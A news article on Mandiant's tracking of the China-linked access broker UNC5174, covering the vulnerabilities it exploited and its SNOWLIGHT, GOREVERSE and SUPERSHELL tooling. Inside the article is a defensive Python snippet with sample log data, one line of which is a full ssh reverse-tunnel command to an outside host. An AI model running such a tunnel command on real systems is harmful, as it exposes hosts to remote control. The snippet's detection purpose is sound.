China-Linked Group Breaches Networks via Connectwise, F5 Software Flaws

News, AntaraNews – A China-linked threat actor exploited security vulnerabilities in ConnectWise ScreenConnect and F5 BIG-IP to deliver custom malware that provides additional backdoors on compromised Linux hosts, as part of what has been described as an “aggressive” campaign.

Mandiant, a subsidiary of Google, is tracking the activity under the moniker UNC5174 (aka Uteus or Uetus). It describes the actor as a “former member of Chinese hacktivist collectives that has since shown indications of acting as a contractor for China’s Ministry of State Security (MSS) focused on executing access operations.”

The threat actor is believed to have orchestrated numerous attacks on Southeast Asian and U.S. universities and research organizations, Hong Kong businesses, charities and non-governmental organisations (NGOs), and U.S. and U.K. government entities between October and November 2023, and again in February 2024 using the ScreenConnect vulnerability.

Initial access to targeted environments is obtained by exploiting known security vulnerabilities in Atlassian Confluence (CVE-2023-22518), ConnectWise ScreenConnect (CVE-2024-1709), F5 BIG-IP (CVE-2023-46747), the Linux kernel (CVE-2022-0185) and Zyxel (CVE-2022-3052).

A successful foothold is followed by extensive reconnaissance and scanning of internet-facing systems for security vulnerabilities, with UNC5174 also creating administrative user accounts to carry out malicious actions that require elevated privileges. This includes dropping a C-based ELF downloader dubbed SNOWLIGHT.

SNOWLIGHT is designed to download the next-stage payload, an obfuscated Golang backdoor dubbed GOREVERSE, from a remote URL. GOREVERSE in turn communicates via SUPERSHELL, an open-source command-and-control (C2) framework that allows attackers to establish a reverse SSH tunnel and launch interactive shell sessions in order to execute arbitrary programs.

Another tool in the attacker’s arsenal is GOHEAVY, a Golang-based tunneling utility likely used to facilitate lateral movement within compromised networks, alongside publicly available tools such as Afrog, DirBuster, Metasploit, Sliver, and sqlmap.
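As an added illustration (not code from the article or from Mandiant), the following Python snippet shows one host-side check for two of the post-exploitation behaviours described above: newly created accounts that are granted membership of an administrative group, and ssh processes opening a reverse tunnel (`-R`). The auth-log and process-listing lines are constructed samples; the user names, hosts and addresses in them are assumptions.

```python
import re

# Constructed sample auth.log lines (shadow-utils syslog format) showing an
# account being created and then added to the sudo group.
SAMPLE_AUTH_LOG = """\
Mar 21 10:02:11 web1 useradd[4412]: new user: name=svcbackup, UID=1003, GID=1003, home=/home/svcbackup, shell=/bin/bash
Mar 21 10:02:15 web1 usermod[4420]: add 'svcbackup' to group 'sudo'
Mar 21 10:05:40 web1 sshd[4501]: Accepted password for deploy from 10.0.0.5 port 51234 ssh2
"""

# Constructed process listing (user, pid, command line); the first entry opens a
# reverse tunnel exposing the local SSH port on a remote host.
SAMPLE_PROCESS_LIST = """\
svcbackup  4555  ssh -o StrictHostKeyChecking=no -N -R 0.0.0.0:2222:127.0.0.1:22 ops@203.0.113.10
deploy     4602  ssh deploy@10.0.0.9
"""

ADMIN_GROUPS = {"sudo", "wheel", "admin", "root"}

NEW_USER_RE = re.compile(r"useradd\[\d+\]: new user: name=(?P<name>[^,]+)")
GROUP_ADD_RE = re.compile(r"usermod\[\d+\]: add '(?P<name>[^']+)' to group '(?P<group>[^']+)'")
REVERSE_TUNNEL_RE = re.compile(r"\bssh\b.*\s-R\s*(?P<spec>\S+)")


def find_new_admin_accounts(auth_log: str) -> list[str]:
    """Return users that were both created and added to an admin group in the log."""
    created, admins = set(), set()
    for line in auth_log.splitlines():
        if m := NEW_USER_RE.search(line):
            created.add(m["name"])
        elif (m := GROUP_ADD_RE.search(line)) and m["group"] in ADMIN_GROUPS:
            admins.add(m["name"])
    return sorted(created & admins)


def find_reverse_ssh_tunnels(process_list: str) -> list[tuple[str, str]]:
    """Return (user, -R forwarding spec) for each ssh process that opens a reverse tunnel."""
    hits = []
    for line in process_list.splitlines():
        parts = line.split(None, 2)  # user, pid, full command line
        if len(parts) < 3:
            continue
        user, _pid, cmd = parts
        if m := REVERSE_TUNNEL_RE.search(cmd):
            hits.append((user, m["spec"]))
    return hits


if __name__ == "__main__":
    print("new admin accounts:", find_new_admin_accounts(SAMPLE_AUTH_LOG))
    print("reverse ssh tunnels:", find_reverse_ssh_tunnels(SAMPLE_PROCESS_LIST))
```

Either hit on its own is not proof of compromise; the combination of a fresh privileged account and an outbound reverse tunnel from that account is what warrants escalation.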

In one unusual incident uncovered by the threat intelligence firm, the threat actors were found to have applied mitigations for CVE-2023-46747, likely in an attempt to prevent other, unrelated adversaries from exploiting the same flaw to gain access.

“UNC5174 (aka Uteus) was previously a member of Chinese hacktivist collectives ‘Dawn Calvary’ and has collaborated with ‘Genesis Day’ / ‘Xiaoqiying’ and ‘Teng Snake,’” Mandiant assessed. “This individual appears to have departed these groups in mid-2023 and has since focused on executing access operations with the intention of brokering access to compromised environments.”

There is evidence to suggest the threat actor may be an initial access broker backed by the MSS, based on their claims on dark web forums. This is further supported by the fact that a number of U.S. defense and U.K. government organizations were targeted by another access broker, dubbed UNC302.

The findings once again highlight Chinese state-sponsored groups’ continued efforts to breach edge devices by rapidly weaponizing zero-days and newly disclosed vulnerabilities to conduct cyber-espionage at scale.

“UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, U.K. government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation,” Mandiant researchers reported.

“There are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape. These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution.”

This comes as the MSS warned the public that an unnamed foreign hacking group had breached “hundreds” of Chinese business and government organizations by using phishing emails and security flaws to compromise their networks. The MSS did not disclose the name of the attacker or the origin of its operations.
